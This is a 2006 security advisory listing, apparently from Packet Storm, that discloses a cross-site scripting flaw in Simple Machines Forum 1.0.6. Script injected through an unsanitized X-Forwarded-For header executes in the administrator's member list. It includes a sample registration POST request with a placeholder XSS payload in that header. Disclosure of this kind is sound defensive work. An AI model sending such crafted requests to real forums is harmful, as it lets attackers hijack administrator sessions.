Lucene search

K
packetstormAliaksandr HartsuyeuPACKETSTORM:44452
HistoryMar 08, 2006 - 12:00 a.m.

EV0086.txt

2006-03-0800:00:00
Aliaksandr Hartsuyeu
packetstormsecurity.com
19

0.013 Low

EPSS

Percentile

84.0%

`New eVuln Advisory:  
Simple Machines Forum - SMF 'X-Forwarded-For' XSS Vulnerability  
http://evuln.com/vulns/86/summary.html  
  
--------------------Summary----------------  
eVuln ID: EV0086  
CVE: CVE-2006-0896  
Software: Simple Machines Forum - SMF  
Sowtware's Web Site: http://www.simplemachines.org/  
Versions: 1.0.6  
Critical Level: Harmless  
Type: Cross-Site Scripting  
Class: Remote  
Status: Unpatched. Developer(s) contacted.  
Exploit: Available  
Solution: Not Available  
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)  
  
-----------------Description---------------  
Vulnerable script: Sources/Register.php  
  
Variable $_SERVER['HTTP_X_FORWARDED_FOR'] isn't properly sanitized. This can be used to post HTTP query with fake X-Forwarded-For value which may contain arbitrary html or script code. This code will be executed when administrator will open "View all members" section in Administrator's control panel .  
  
Administrator's session is threatened.  
  
--------------Exploit----------------------  
Available at: http://evuln.com/vulns/86/exploit.html  
  
Example of HTTP POST Query:  
  
  
POST /smf/index.php? PHPSESSID=fa9c180d0a3f5fae0de2d56ba6fce944&action=register2 HTTP/1.0  
Host: [host]  
X-Forwarded-For: anyIP[XSS]  
Cookie: PHPSESSID=fa9c180d0a3f5fae0de2d56ba6fce944  
Content-Length: 81  
  
user=mmm&[email protected]&passwrd1=mmm&passwrd2=mmm&regagree=1&regSubmit=Register  
  
--------------Solution---------------------  
No Patch available.  
  
--------------Credit-----------------------  
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)  
  
  
Regards,  
Aliaksandr Hartsuyeu  
http://evuln.com - Penetration Testing Services  
.  
`

0.013 Low

EPSS

Percentile

84.0%

Related for PACKETSTORM:44452